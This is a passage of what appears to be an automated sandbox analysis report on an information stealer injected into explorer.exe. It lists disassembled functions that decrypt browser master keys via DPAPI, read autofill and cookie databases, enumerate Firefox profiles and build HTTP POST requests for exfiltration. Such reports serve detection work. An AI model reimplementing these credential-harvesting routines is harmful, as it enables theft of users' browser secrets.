                                                                                                                                        • Part of subcall function 007E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 007E19C4
                                                                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 007E1DA9
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362CC), ref: 007E1DCF
                                                                                                                                      • lstrcmpiW.KERNEL32(?,008362D0), ref: 007E1DE7
                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 007E1E62
                                                                                                                                        • Part of subcall function 007E1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,007E2C27), ref: 007E1D02
                                                                                                                                        • Part of subcall function 007E1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 007E1D0D
                                                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 007E1E94
                                                                                                                                      • FindClose.KERNELBASE(00000000), ref: 007E1EA3
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                                                                                                      • String ID: *.*$\*.*
                                                                                                                                      • API String ID: 232625764-1692270452
                                                                                                                                      • Opcode ID: ed488d392e2ada254dc6b13855e888e4efb9c350a98b6459447b96b99cb759e2
                                                                                                                                      • Instruction ID: f9a816ac80dba1f9d2eef14cdf8468ccd44a798e9d57710d1ebcd4bd7fbb6d8c
                                                                                                                                      • Opcode Fuzzy Hash: ed488d392e2ada254dc6b13855e888e4efb9c350a98b6459447b96b99cb759e2
                                                                                                                                      • Instruction Fuzzy Hash: D731A9303053C19BCB24EB76889AA6F77E9AFCC341F444A29F946C7251EB7DCC198691
                                                                                                                                      Function 007E3E04 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 75encryptionCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 641 7e3e04-7e3e11 call 7e1b6a 644 7e3e17-7e3e22 call 7e1c31 641->644 645 7e3ed4-7e3ed8 641->645 644->645 648 7e3e28-7e3e34 call 7e2fb1 644->648 651 7e3e3a-7e3e4f call 7e123b 648->651 652 7e3ec8-7e3ecc 648->652 655 7e3ec0-7e3ec7 call 7e1011 651->655 656 7e3e51-7e3e58 651->656 652->645 655->652 658 7e3ebf 656->658 659 7e3e5a-7e3e6a 656->659 658->655 661 7e3e6c-7e3e7c RtlCompareMemory 659->661 662 7e3eb8-7e3eba call 7e1011 659->662 661->662 664 7e3e7e-7e3ea6 CryptUnprotectData 661->664 662->658 664->662 665 7e3ea8-7e3ead 664->665 665->662 666 7e3eaf-7e3eb3 665->666 666->662
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                        • Part of subcall function 007E1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,00000000,00000000,00000000,007E3E1E,00000000,?,007E3FA8), ref: 007E1C46
                                                                                                                                        • Part of subcall function 007E1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,007E3FA8), ref: 007E1C56
                                                                                                                                        • Part of subcall function 007E1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,007E3FA8), ref: 007E1C76
                                                                                                                                        • Part of subcall function 007E1C31: CloseHandle.KERNELBASE(00000000,?,007E3FA8), ref: 007E1C91
                                                                                                                                        • Part of subcall function 007E2FB1: StrStrIA.KERNELBASE(00000000,"encrypted_key":",00000000,00000000,00000000,007E3E30,00000000,00000000,?,007E3FA8), ref: 007E2FC1
                                                                                                                                        • Part of subcall function 007E2FB1: lstrlen.KERNEL32("encrypted_key":",?,007E3FA8), ref: 007E2FCE
                                                                                                                                        • Part of subcall function 007E2FB1: StrStrIA.SHLWAPI("encrypted_key":",0083692C,?,007E3FA8), ref: 007E2FDD
                                                                                                                                        • Part of subcall function 007E123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,007E3E4B,00000000), ref: 007E124A
                                                                                                                                        • Part of subcall function 007E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1268
                                                                                                                                        • Part of subcall function 007E123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 007E1295
                                                                                                                                      • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 007E3E74
                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 007E3E9E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                                                                                                      • String ID: $DPAP$DPAP$IDPAP
                                                                                                                                      • API String ID: 3076719866-957854035
                                                                                                                                      • Opcode ID: 3dd3cd6b439b94663e6f72cbc59795a4fcbcd2eb9f9d9690f8e2bb4a715d75f3
                                                                                                                                      • Instruction ID: 11e62519d99761594fb79e335db9ccd465c50204c7e25daa28bcb900bda17833
                                                                                                                                      • Opcode Fuzzy Hash: 3dd3cd6b439b94663e6f72cbc59795a4fcbcd2eb9f9d9690f8e2bb4a715d75f3
                                                                                                                                      • Instruction Fuzzy Hash: 7B2195716053859BD721EA6A8C85A7FB3DD6B8C700F85062DF845C7201EB78CE4587D2
                                                                                                                                      Function 00849247 Relevance: 6.3, APIs: 4, Instructions: 343COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.0000000000847000.00000040.80000000.00040000.00000000.sdmp, Offset: 00847000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_847000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 106e5a7f180de2e66b0bf93fd4fc1fef305e6ab6dc4ed712bb108012cb19ffb5
                                                                                                                                      • Instruction ID: 36ae9cf180711c53da128bdf57ba9c622501ce456ba6b0005a7899df10b00852
                                                                                                                                      • Opcode Fuzzy Hash: 106e5a7f180de2e66b0bf93fd4fc1fef305e6ab6dc4ed712bb108012cb19ffb5
                                                                                                                                      • Instruction Fuzzy Hash: E5A1397291475A5BDB318E78CCC06A2BBA4FB52324B2D06ADC5E1CB2C2E7A4580BC755
                                                                                                                                      Function 007E4B92 Relevance: 3.0, APIs: 2, Instructions: 26nativeCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 007E116F
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 007E4BB6
                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 007E4BBF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1675517319-0
                                                                                                                                      • Opcode ID: 51057e2e58ac084adc5c75899fb2e88d167ba1c01d166a5577ecf4f6243a6792
                                                                                                                                      • Instruction ID: a1186973371330a129850d9bbce1f4a78cd3de6fed00e1c68635ae7c504584d9
                                                                                                                                      • Opcode Fuzzy Hash: 51057e2e58ac084adc5c75899fb2e88d167ba1c01d166a5577ecf4f6243a6792
                                                                                                                                      • Instruction Fuzzy Hash: 0AE0D871802290E7CA58BB36BC1EA4B3B58AF9A361F10C914F26592090DA3DC841C660
                                                                                                                                      Function 007E1011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 007E116F
                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,007E1A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2), ref: 007E1020
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,007E1AE2,PortNumber,00000000,00000000), ref: 007E1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2580854192-0
                                                                                                                                      • Opcode ID: c577c97a9eab4682f1207cfbfdd1ca31b430fda8dd96af02ef1f113e607c6480
                                                                                                                                      • Instruction ID: f0c20b85706ee4dc181ed08eafa581259dd9495c746880ec1785d12eeb200969
                                                                                                                                      • Opcode Fuzzy Hash: c577c97a9eab4682f1207cfbfdd1ca31b430fda8dd96af02ef1f113e607c6480
                                                                                                                                      • Instruction Fuzzy Hash: 48C08C310022A0A2C96027A93C0EBCE3B18EF8D222F000881B60193142CAB98C4082A0
                                                                                                                                      Function 007E6512 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetSystemInfo.KERNELBASE(008420A4,00000001,00000000,0000000A,00833127,007E28DA,00000000,?), ref: 007EBFFC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 31276548-0
                                                                                                                                      • Opcode ID: 2c753ebd06eaf0d0203d00e69c54f1e53a149b90261efbfd83a0f7e9ba3ca59e
                                                                                                                                      • Instruction ID: 28c0423bb8933fdd1e0579945219bed349647f037b352101d547bb9a0f980793
                                                                                                                                      • Opcode Fuzzy Hash: 2c753ebd06eaf0d0203d00e69c54f1e53a149b90261efbfd83a0f7e9ba3ca59e
                                                                                                                                      • Instruction Fuzzy Hash: 85E092317C6384B0EA1033FA6C0FF461445ABA9F80F604521B720E81CADB9D90901022
                                                                                                                                      Function 007E3C40 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 147stringfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 007E3C6A
                                                                                                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 007E3C76
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000), ref: 007E3C7D
                                                                                                                                      • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 007E3C89
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 007E3D2F
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3D36
                                                                                                                                      • wsprintfA.USER32 ref: 007E3D55
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E3D61
                                                                                                                                      • lstrcat.KERNEL32(00000000,?), ref: 007E3D89
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 007E3DB2
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E3DED
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                                                                                                      • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                                                                                                      • API String ID: 2923052733-3488123210
                                                                                                                                      • Opcode ID: 328db580bd4735d4e05d970a42a737e2ffb5a7934eb96ba3df8ef7e6acbdf0d7
                                                                                                                                      • Instruction ID: 7b3ff8116fa9fc8aa90e23742ede05b8f0646207df548a2ad292655a86a872da
                                                                                                                                      • Opcode Fuzzy Hash: 328db580bd4735d4e05d970a42a737e2ffb5a7934eb96ba3df8ef7e6acbdf0d7
                                                                                                                                      • Instruction Fuzzy Hash: F541A430605281ABD715AB7ACC8AD3F77ADEFC9744F40482CF445E7252EA39DD058B62
                                                                                                                                      Function 007E28F8 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 158stringfileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 348 7e28f8-7e28fa 349 7e2ac8-7e2ada call 833848 DeleteFileW call 7e1011 348->349 350 7e2900-7e291c call 7e1000 call 8002ec 348->350 358 7e2adf-7e2ae6 349->358 359 7e2a8f-7e2aa2 call 7ffb92 lstrlen 350->359 360 7e2922-7e293a call 7e1fa7 350->360 365 7e2aa4-7e2abc call 7e1798 * 3 359->365 366 7e2ac1-7e2ac3 call 7e1011 359->366 367 7e293c-7e2942 360->367 368 7e2948-7e295f call 7e1fa7 360->368 365->366 366->349 367->368 370 7e2944 367->370 376 7e296d-7e2984 call 7e1fa7 368->376 377 7e2961-7e2967 368->377 370->368 383 7e2986-7e298c 376->383 384 7e2992-7e29a7 call 7e1fa7 376->384 377->376 379 7e2969 377->379 379->376 383->384 385 7e298e 383->385 388 7e29a9-7e29af 384->388 389 7e29b5-7e29cc call 7e1fa7 384->389 385->384 388->389 390 7e29b1 388->390 393 7e29ce-7e29d4 389->393 394 7e29da-7e29e5 lstrlen 389->394 390->389 393->394 395 7e29d6 393->395 396 7e29eb-7e29f0 lstrlen 394->396 397 7e2a79-7e2a85 call 8002ec 394->397 395->394 396->397 399 7e29f6-7e2a11 call 7e1000 396->399 397->360 403 7e2a8b 397->403 404 7e2a1b-7e2a56 call 7e2112 wsprintfA lstrlen 399->404 405 7e2a13 399->405 403->359 408 7e2a6a-7e2a74 lstrcat call 7e1011 404->408 409 7e2a58-7e2a68 call 7e102f 404->409 405->404 408->397 409->408
                                                                                                                                      APIs
                                                                                                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 007E2AD2
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 007E29E1
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E29EC
                                                                                                                                      • wsprintfA.USER32 ref: 007E2A38
                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 007E2A44
                                                                                                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 007E2A6C
                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 007E2A99
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: lstrlen$Heap$AllocateDeleteFileProcesslstrcatwsprintf
                                                                                                                                      • String ID: %sTRUE%s%s%s%s%s$COOKIES$FALSE$TRUE
                                                                                                                                      • API String ID: 304071051-2605711689
                                                                                                                                      • Opcode ID: bec62ef71978f611cb9a35f4624bc79fbb4bb6f118cbc11cd159b5942991e9c6
                                                                                                                                      • Instruction ID: b32b03b29633767f78508882712f210b53d3a5d580f8213ace42044430040af5
                                                                                                                                      • Opcode Fuzzy Hash: bec62ef71978f611cb9a35f4624bc79fbb4bb6f118cbc11cd159b5942991e9c6
                                                                                                                                      • Instruction Fuzzy Hash: 0451A1306063C69BC725EF369855A3E76D9AFCD304F04482DF885AB253EB39DC468762
                                                                                                                                      Function 007E2CB5 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 112stringCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 484 7e2cb5-7e2cc7 call 7e1953 488 7e2ccd-7e2d06 call 7e1953 call 7e1000 * 2 call 7e1b6a 484->488 489 7e2e17-7e2e2d call 7e2ae9 484->489 500 7e2d0c-7e2d1c GetPrivateProfileSectionNamesW 488->500 501 7e2df9-7e2e12 call 7e1011 * 4 488->501 500->501 503 7e2d22-7e2d26 500->503 501->489 505 7e2d2c-7e2d32 503->505 506 7e2df5 503->506 507 7e2d36-7e2d39 505->507 506->501 509 7e2d3f-7e2d4d StrStrIW 507->509 510 7e2ded-7e2df1 507->510 512 7e2dd7-7e2de7 lstrlenW 509->512 513 7e2d53-7e2d70 GetPrivateProfileStringW 509->513 510->506 512->507 512->510 513->512 515 7e2d72-7e2d88 GetPrivateProfileIntW 513->515 517 7e2dcc-7e2dd2 call 7e2ae9 515->517 518 7e2d8a-7e2d9c call 7e1953 515->518 517->512 523 7e2d9e-7e2da2 518->523 524 7e2db4-7e2dca call 7e2ae9 call 7e1011 518->524 525 7e2dac-7e2db2 523->525 526 7e2da4-7e2daa 523->526 524->512 525->523 525->524 526->525
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,007E2F0C), ref: 007E1973
                                                                                                                                        • Part of subcall function 007E1953: lstrlenW.KERNEL32(00836564,?,?,007E2F0C), ref: 007E1978
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,?,?,?,007E2F0C), ref: 007E1990
                                                                                                                                        • Part of subcall function 007E1953: lstrcatW.KERNEL32(00000000,00836564,?,?,007E2F0C), ref: 007E1994
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                        • Part of subcall function 007E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,007E2893,00000000,00000000,00000000,?), ref: 007E1B82
                                                                                                                                        • Part of subcall function 007E1B6A: CloseHandle.KERNELBASE(00000000), ref: 007E1B8F
                                                                                                                                      • GetPrivateProfileSectionNamesW.KERNEL32(00000000,0000FDE8,00000000), ref: 007E2D13
                                                                                                                                      • StrStrIW.SHLWAPI(00000000,Profile), ref: 007E2D45
                                                                                                                                      • GetPrivateProfileStringW.KERNEL32(00000000,Path,0083637C,?,00000FFF,?), ref: 007E2D68
                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(00000000,IsRelative,00000001,?), ref: 007E2D7B
                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 007E2DD8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: PrivateProfilelstrlen$Heaplstrcat$AllocateCloseCreateFileHandleNamesProcessSectionString
                                                                                                                                      • String ID: IsRelative$Path$Profile$profiles.ini
                                                                                                                                      • API String ID: 2234428054-4107377610
                                                                                                                                      • Opcode ID: a40e0fb4eecb1a15bb24d0a8251681fcdf4d890f144fb16aa815e5eacc7f852a
                                                                                                                                      • Instruction ID: 55a6e9b884f3b8b80d64cc35c33bbea70cefbb9a1b87666155b25f4e6eaf4ca9
                                                                                                                                      • Opcode Fuzzy Hash: a40e0fb4eecb1a15bb24d0a8251681fcdf4d890f144fb16aa815e5eacc7f852a
                                                                                                                                      • Instruction Fuzzy Hash: E031A230706381ABD614EB368C1662F77A6AFCD300F50883DFA45A7293EA7D8C569791
                                                                                                                                      Function 007E1333 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 226COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 576 7e1333-7e1385 call 7e1000 call 7e106c call 7e12a3 583 7e1387-7e139e 576->583 584 7e13a0-7e13a3 576->584 587 7e13b0-7e13b2 583->587 586 7e13aa-7e13ac 584->586 586->587 588 7e15cb-7e15da call 7e1011 587->588 589 7e13b8-7e13ef RtlZeroMemory 587->589 593 7e13f5-7e141a 589->593 594 7e15c3-7e15ca 589->594 597 7e15bf 593->597 598 7e1420-7e1456 call 7e10b1 593->598 594->588 597->594 601 7e145d-7e1478 598->601 602 7e1458 598->602 604 7e147e-7e1483 601->604 605 7e15b5 601->605 602->601 606 7e149d-7e14c7 call 7e1000 wsprintfW 604->606 607 7e1485-7e1496 604->607 605->597 610 7e14c9-7e14cb 606->610 611 7e14e0-7e1500 606->611 607->606 612 7e14cc-7e14cf 610->612 617 7e1507-7e1509 611->617 614 7e14da-7e14dc 612->614 615 7e14d1-7e14d6 612->615 614->611 615->612 616 7e14d8 615->616 616->611 618 7e150f-7e151b 617->618 619 7e15a5-7e15b0 call 7e1011 617->619 618->619 622 7e1521-7e1537 call 7e1000 618->622 619->605 626 7e1539-7e1544 622->626 627 7e1558-7e156f 626->627 628 7e1546-7e1553 call 7e102f 626->628 632 7e1573-7e157d 627->632 633 7e1571 627->633 628->627 632->626 634 7e157f-7e1583 632->634 633->632 635 7e159a-7e15a1 call 7e1011 634->635 636 7e1585-7e1594 call 7e104c RtlMoveMemory 634->636 635->619 636->635
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 007E1000: GetProcessHeap.KERNEL32(00000008,?,007E11C7,?,?,00000001,00000000,?), ref: 007E1003
                                                                                                                                        • Part of subcall function 007E1000: RtlAllocateHeap.NTDLL(00000000), ref: 007E100A
                                                                                                                                        • Part of subcall function 007E106C: lstrlen.KERNEL32(032A163E,00000000,00000000,00000000,007E1366,75568A60,032A163E,00000000), ref: 007E1074
                                                                                                                                        • Part of subcall function 007E106C: MultiByteToWideChar.KERNEL32(00000000,00000000,032A163E,00000001,00000000,00000000), ref: 007E1086
                                                                                                                                        • Part of subcall function 007E12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 007E12B5
                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 007E13C2
                                                                                                                                      • wsprintfW.USER32 ref: 007E14B5
                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 007E1594
                                                                                                                                      Strings
                                                                                                                                      • Accept: */*Referer: %S, xrefs: 007E14AF
                                                                                                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 007E14FB
                                                                                                                                      • POST, xrefs: 007E1465
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                                      • API String ID: 3833683434-704803497
                                                                                                                                      • Opcode ID: 5b74b0d18cf40e833f3a899548883faf39606a182c20c35ca3280c6aa39b7404
                                                                                                                                      • Instruction ID: 7ac1fd7ca74f6251d50ab2956feafd14711a853d171b64789f30c356b796f654
                                                                                                                                      • Opcode Fuzzy Hash: 5b74b0d18cf40e833f3a899548883faf39606a182c20c35ca3280c6aa39b7404
                                                                                                                                      • Instruction Fuzzy Hash: F77157B0609381AFD7109F29DC89A2FBBE9FB88344F40492DF955C3251EB78D9148B92
                                                                                                                                      Function 007EB1E5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 174fileCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 667 7eb1e5-7eb20b 668 7eb20d-7eb218 call 7eaeea 667->668 669 7eb221-7eb22a 667->669 680 7eb21e 668->680 681 7eb3ea-7eb3f0 668->681 670 7eb22c-7eb237 call 7eae65 669->670 671 7eb240-7eb243 669->671 682 7eb23d 670->682 683 7eb3b4-7eb3b7 670->683 674 7eb3b9-7eb3d3 671->674 675 7eb249-7eb26b call 7ea7ae 671->675 679 7eb3db-7eb3df 674->679 687 7eb26d-7eb278 675->687 688 7eb296-7eb29f 675->688 685 7eb3e8 679->685 686 7eb3e1-7eb3e3 679->686 680->669 682->671 683->674 689 7eb3d5-7eb3d8 683->689 685->681 686->685 690 7eb3e5-7eb3e7 686->690 691 7eb27d-7eb291 call 7ea1c6 687->691 692 7eb2d6-7eb2ea call 7e6a5a 688->692 693 7eb2a1 688->693 689->679 690->685 691->683 701 7eb2ec-7eb2f1 692->701 702 7eb2f6-7eb2fd 692->702 694 7eb2a9-7eb2ad 693->694 695 7eb2a3-7eb2a7 693->695 694->683 697 7eb2b3-7eb2b9 call 7ea67c 694->697 695->692 695->694 704 7eb2be-7eb2c2 697->704 701->683 705 7eb2ff-7eb30e 702->705 706 7eb373 702->706 704->692 709 7eb2c4-7eb2d4 704->709 708 7eb377-7eb37a 705->708 706->708 710 7eb37c 708->710 711 7eb310-7eb329 CreateFileMappingW 708->711 709->691 710->683 712 7eb37e-7eb3ab call 7ea1c6 711->712 713 7eb32b-7eb357 MapViewOfFile 711->713 712->683 718 7eb3ad 712->718 713->712 714 7eb359-7eb370 713->714 714->706 718->683
                                                                                                                                      APIs
                                                                                                                                      • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,00000006,00000000,?,?,00000000), ref: 007EB31D
                                                                                                                                      • MapViewOfFile.KERNELBASE(?,?,00000000,?,?), ref: 007EB34F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000007.00000002.2375213933.00000000007E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 007E1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_7_2_7e1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$CreateMappingView
                                                                                                                                      • String ID: winShmMap1$winShmMap2$winShmMap3
                                                                                                                                      • API String ID: 3452162329-3826999013
